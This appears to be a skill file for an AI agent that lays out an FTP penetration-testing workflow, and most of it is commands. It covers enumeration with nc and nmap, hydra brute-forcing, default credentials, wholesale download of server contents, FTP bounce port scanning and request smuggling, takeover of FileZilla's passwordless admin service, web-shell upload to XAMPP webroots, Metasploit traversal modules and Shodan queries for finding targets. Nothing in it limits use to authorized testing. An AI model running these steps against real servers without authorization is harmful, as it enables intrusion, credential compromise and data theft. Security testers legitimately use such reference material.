FTP Pentesting Skill

This skill helps you perform comprehensive security testing against FTP (File Transfer Protocol) servers on port 21.

Quick Start

When testing an FTP server, follow this workflow:

1. Enumerate - Banner grab, check for anonymous access, run nmap scripts
2. Authenticate - Test default credentials, brute force if needed
3. Explore - List files, check permissions, download/upload test files
4. Exploit - FTP bounce attacks, configuration weaknesses, post-exploitation

Enumeration

Banner Grabbing

Get initial information about the FTP server:

# Basic banner grab
nc -vn <IP> 21

# Get certificate if STARTTLS is supported
openssl s_client -connect <IP>:21 -starttls ftp

# Connect via telnet for raw protocol inspection
telnet <IP> 21

Nmap Enumeration

Run comprehensive FTP scans:

# Basic service detection with default scripts
sudo nmap -sV -p21 -sC -A <IP>

# All FTP-specific scripts
nmap --script ftp-* -p 21 <IP>

# Anonymous login and bounce checks (included in -sC)
nmap -sC -p21 <IP>

Manual Command Enumeration

Connect and query the server for supported commands:

ftp <IP>
> HELP      # List supported commands
> FEAT      # Show server features
> STAT      # Server status and version info

Look for these indicators in the output:

• AUTH TLS

  - Server supports encrypted connections

• PASV

  - Passive mode supported

• PORT

  - Active mode supported (potential bounce attack vector)

• MLSD/MLST

  - Machine-readable directory listings

Anonymous Login Testing

Test common anonymous credentials:

# Standard anonymous login
ftp <IP>
> anonymous
> anonymous
> ls -a          # List all files including hidden
> binary        # Set binary transfer mode
> bye

# Alternative anonymous credentials to try
# anonymous : anonymous
# anonymous : (empty password)
# ftp : ftp

Browser Connection

Quick access via browser:

# Firefox/Chrome can connect directly
ftp://anonymous:anonymous@<IP>
ftp://<username>:<password>@<IP>

Connection Techniques

Active vs Passive Mode

Active FTP:

• Client initiates control connection to port 21
• Client listens on port N+1 for data connection
• Server initiates data connection back to client
• Problematic if client has firewall blocking incoming connections

Passive FTP:

• Client initiates control connection to port 21
• Client sends PASV command
• Server provides port M for data connection
• Client initiates data connection to server port M
• Works better through firewalls

Using lftp with TLS

lftp
lftp :~> set ftp:ssl-force true
lftp :~> set ssl:verify-certificate no
lftp :~> connect <IP>
lftp <IP>:~> login <username> <password>

Debugging Connections

Enable verbose output to see protocol details:

ftp <IP>
> debug     # Enable debug mode
> trace     # Enable trace mode

FTP Commands Reference

Authentication

USER <username>

PASS <password>

File Operations

LIST

LIST -R

RETR <file>

STOR <file>

APPE <file>

STOU <file>

PUT <file>

TYPE i

TYPE a

Connection Control

PASV

PORT <ip,port>

REST <byte>

Directory Operations

CWD <dir>

PWD

MKD <dir>

RMD <dir>

DELE <file>

Information

HELP

FEAT

STAT

SYST

NOOP

Downloading Files

Using wget

# Download entire FTP site
wget -m ftp://<user>:<pass>@<IP>

# Force active mode (if passive disabled)
wget -m --no-passive ftp://<user>:<pass>@<IP>

# With special characters in credentials
wget -r --user="USERNAME" --password="PASSWORD" ftp://<IP>/

Using curl

# Download single file
curl -u <user>:<pass> ftp://<IP>/path/to/file

# List directory
curl -u <user>:<pass> ftp://<IP>/

Brute Force Attacks

Using hydra

# Basic brute force with username
hydra -t 1 -l <username> -P <password_list> <IP> ftp

# With wordlist for both username and password
hydra -t 1 -L <user_list> -P <pass_list> <IP> ftp

# Verbose output
hydra -t 1 -l <username> -P <password_list> -vV <IP> ftp

Default Credentials

Test these common FTP credentials:

• anonymous:anonymous

• anonymous:

  (empty password)

• ftp:ftp

• admin:admin

• root:root

• daemon:daemon

• nobody:nobody

Reference: SecLists FTP defaults

FTP Bounce Attacks

Some FTP servers allow the PORT command to redirect connections to arbitrary hosts. This can be used for:

• Port scanning through the FTP server
• Sending arbitrary data to other services
• Downloading files from other FTP servers

Port Scanning via FTP Bounce

# The PORT command format: PORT h1,h2,h3,h4,p1,p2
# IP: 127.0.0.1, Port 80 = PORT 127,0,0,1,0,80

ftp <vulnerable_ftp_server>
> PORT 127,0,0,1,0,80
> LIST

If the target port is open, the server will attempt to connect and you'll see a different error than if it's closed.

Sending HTTP Requests via FTP Bounce

1. Create a file with the HTTP request (use

   0x0d 0x0a

   for line endings)
2. Upload to the vulnerable FTP server
3. Use REST to skip any header bytes
4. Use PORT to connect to target HTTP server
5. Use RETR to send the request

# Example: Create request file
echo -e "GET /admin HTTP/1.1\r\nHost: target\r\n\r\n" > request.txt

# Upload to FTP
ftp <vulnerable_server>
> binary
> PUT request.txt

# Send to target
> PORT <target_ip>,<target_port>
> REST 0
> RETR request.txt

Note: The connection may timeout. Workarounds:

• Repeat the request multiple times (~0.5MB)
• Fill with protocol-appropriate junk data
• Use null characters to pad the request

FileZilla Server Vulnerability

FileZilla Server often binds an administrative service to port 14147 on localhost with no password.

Exploitation Steps

1. Create a tunnel to port 14147 (via SSH, reverse shell, etc.)
2. Connect to the admin interface with blank password
3. Create a new FTP user with full access
4. Use the new credentials to access FTP

Configuration Analysis

Common Config Files

/etc/vsftpd.conf

/etc/proftpd.conf

/etc/ftp.conf

/etc/ftpusers

Dangerous vsFTPd Settings

Check for these insecure configurations:

# Anonymous access enabled
anonymous_enable=YES

# Anonymous upload allowed
anon_upload_enable=YES
anon_mkdir_write_enable=YES

# Anonymous root directory
anon_root=/home/username/ftp

# Ownership changes on upload
chown_uploads=YES
chown_username=username

# Local user access
local_enable=YES

# Write permissions
write_enable=YES

XAMPP/ProFTPD Webroot Mapping

XAMPP often maps FTP root to

/opt/lampp/htdocs

daemon

nobody

1. Uploading PHP web shells directly to webroot
2. Executing arbitrary code via web interface
3. Full system compromise

Post-Exploitation

Metasploit FTP Modules

# Anonymous login scanner
msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS <IP>; run; exit'

# FTP version scanner
msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS <IP>; run; exit'

# Bison FTP traversal
msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS <IP>; run; exit'

# Colorado FTP traversal
msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS <IP>; run; exit'

# Titan FTP XCRC traversal
msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS <IP>; run; exit'

Shodan Queries

Find FTP servers on Shodan:

• ftp

• port:21

• ftp anonymous

• vsftpd

Common Issues and Solutions

Connection Timeouts

• Try passive mode:

  wget --no-passive

  or

  lftp

  with

  set ftp:ssl-force

• Check firewall rules on both client and server
• Use

  telnet

  or

  nc

  to verify port is open

Transfer Mode Issues

• Use

  binary

  mode for non-text files
• Use

  ascii

  mode for text files
• Check with

  TYPE

  command

Permission Denied

• Check if anonymous upload is enabled
• Look for writable directories
• Try different user accounts

Security Considerations

FTP transmits credentials in plaintext. Always:

• Use FTPS (FTP over TLS) when available
• Consider SFTP or SCP for secure transfers
• Never use FTP for sensitive data without encryption

References

• HackTricks FTP Pentesting
• SecLists FTP Default Credentials
• FTP Bounce Attack Tutorial